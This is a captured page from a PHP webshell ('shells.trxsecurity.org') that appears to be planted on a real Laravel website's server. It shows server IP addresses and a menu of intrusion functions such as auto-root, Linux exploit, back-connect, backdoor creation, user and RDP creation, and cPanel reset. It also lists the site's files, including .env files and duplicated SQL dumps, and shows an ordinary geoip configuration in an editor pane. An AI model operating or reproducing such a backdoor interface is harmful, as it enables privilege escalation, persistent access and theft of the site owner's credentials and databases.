Linux lionsclub 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 161.35.52.75 | : 3.140.240.187
Cant Read [ /etc/named.conf ]
7.4.28
www-data
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
lionsclub /
core /
storage /
framework /
[ HOME SHELL ]
Name
Size
Permission
Action
cache
[ DIR ]
drwxrwxrwx
sessions
[ DIR ]
drwxrwxrwx
testing
[ DIR ]
drwxrwxrwx
views
[ DIR ]
drwxrwxrwx
.DS_Store
18
KB
-rwxrwxrwx
.editorconfig
220
B
-rw-r--r--
.env
1.48
KB
-rw-r--r--
.env.example
782
B
-rw-r--r--
.gitattributes
111
B
-rw-r--r--
.gitignore
119
B
-rwxrwxrwx
.htaccess
240
B
-rw-r--r--
.styleci-20250224012800.yml
174
B
-rw-r--r--
.styleci.yml
174
B
-rw-r--r--
-20250224043740.gitattributes
111
B
-rw-r--r--
-20250224050934.editorconfig
220
B
-rw-r--r--
-20250224080507.DS_Store
18
KB
-rw-r--r--
-20250224080520.env
1.48
KB
-rw-r--r--
-20250224081222.env
1.48
KB
-rw-r--r--
165e3e1b1a06d3d10ed80592d8db6f...
14.09
KB
-rw-r--r--
667429198dbf630d8ff5259194d3f8...
17.63
KB
-rw-r--r--
HEAD
21
B
-rw-r--r--
README-20250224040521.md
9.77
KB
-rw-r--r--
README-20250224105211.md
9.77
KB
-rw-r--r--
README.md
9.77
KB
-rw-r--r--
TestCase.php
163
B
-rw-r--r--
_installed
66
B
-rw-r--r--
afb0cb507ec0a672e7308f272d1c33...
6.13
KB
-rw-r--r--
app.php
1.58
KB
-rw-r--r--
artisan
1.65
KB
-rw-r--r--
captcha.php
154
B
-rw-r--r--
composer.json
1.96
KB
-rw-r--r--
geoip.php
4.78
KB
-rw-r--r--
installed
66
B
-rw-r--r--
output_file-20250224060901.sql
3.55
MB
-rw-r--r--
output_file-20250224081852.sql
3.55
MB
-rw-r--r--
output_file.sql
3.55
MB
-rw-r--r--
package-lock-20250224083300.js...
469.75
KB
-rw-r--r--
package-lock.json
469.75
KB
-rw-r--r--
package.json
1.1
KB
-rw-r--r--
phpunit.xml
1.17
KB
-rw-r--r--
server.php
563
B
-rw-r--r--
session.php
6.88
KB
-rw-r--r--
tailwind.config-20250224040153...
454
B
-rw-r--r--
tailwind.config-20250224040153...
454
B
-rw-r--r--
tailwind.config-20250224082221...
454
B
-rw-r--r--
tailwind.config.js
454
B
-rw-r--r--
webpack.mix.js
598
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : geoip.php
<?php return [ /* |-------------------------------------------------------------------------- | Logging Configuration |-------------------------------------------------------------------------- | | Here you may configure the log settings for when a location is not found | for the IP provided. | */ 'log_failures' => false, /* |-------------------------------------------------------------------------- | Include Currency in Results |-------------------------------------------------------------------------- | | When enabled the system will do it's best in deciding the user's currency | by matching their ISO code to a preset list of currencies. | */ 'include_currency' => true, /* |-------------------------------------------------------------------------- | Default Service |-------------------------------------------------------------------------- | | Here you may specify the default storage driver that should be used | by the framework. | | Supported: "maxmind_database", "maxmind_api", "ipapi" | */ 'service' => env('GEOIP_SERVICE', 'ipapi'), /* |-------------------------------------------------------------------------- | Storage Specific Configuration |-------------------------------------------------------------------------- | | Here you may configure as many storage drivers as you wish. | */ 'services' => [ 'maxmind_database' => [ 'class' => \Torann\GeoIP\Services\MaxMindDatabase::class, 'database_path' => storage_path('app/geoip.mmdb'), 'update_url' => sprintf('https://download.maxmind.com/app/geoip_download?edition_id=GeoLite2-City&license_key=%s&suffix=tar.gz', env('MAXMIND_LICENSE_KEY')), 'locales' => ['en'], ], 'maxmind_api' => [ 'class' => \Torann\GeoIP\Services\MaxMindWebService::class, 'user_id' => env('MAXMIND_USER_ID'), 'license_key' => env('MAXMIND_LICENSE_KEY'), 'locales' => ['en'], ], 'ipapi' => [ 'class' => \Torann\GeoIP\Services\IPApi::class, 'secure' => true, 'key' => env('GEOIP_SERVICE_KEY'), 'continent_path' => storage_path('app/continents.json'), 'lang' => 'en', ], 'ipgeolocation' => [ 'class' => \Torann\GeoIP\Services\IPGeoLocation::class, 'secure' => true, 'key' => env('GEOIP_SERVICE_KEY'), 'continent_path' => storage_path('app/continents.json'), 'lang' => 'en', ], 'ipdata' => [ 'class' => \Torann\GeoIP\Services\IPData::class, 'key' => env('GEOIP_SERVICE_KEY'), 'secure' => true, ], 'ipfinder' => [ 'class' => \Torann\GeoIP\Services\IPFinder::class, 'key' => env('GEOIP_SERVICE_KEY'), 'secure' => true, 'locales' => ['en'], ], ], /* |-------------------------------------------------------------------------- | Default Cache Driver |-------------------------------------------------------------------------- | | Here you may specify the type of caching that should be used | by the package. | | Options: | | all - All location are cached | some - Cache only the requesting user | none - Disable cached | */ 'cache' => 'all', /* |-------------------------------------------------------------------------- | Cache Tags |-------------------------------------------------------------------------- | | Cache tags are not supported when using the file or database cache | drivers in Laravel. This is done so that only locations can be cleared. | */ 'cache_tags' => [], /* |-------------------------------------------------------------------------- | Cache Expiration |-------------------------------------------------------------------------- | | Define how long cached location are valid. | */ 'cache_expires' => 30, /* |-------------------------------------------------------------------------- | Default Location |-------------------------------------------------------------------------- | | Return when a location is not found. | */ 'default_location' => [ 'ip' => '127.0.0.0', 'iso_code' => 'US', 'country' => 'unknown', 'city' => 'unknown', 'state' => 'CT', 'state_name' => 'Connecticut', 'postal_code' => '06510', 'lat' => 41.31, 'lon' => -72.92, 'timezone' => 'America/New_York', 'continent' => 'NA', 'default' => true, 'currency' => 'USD', ], ];
Close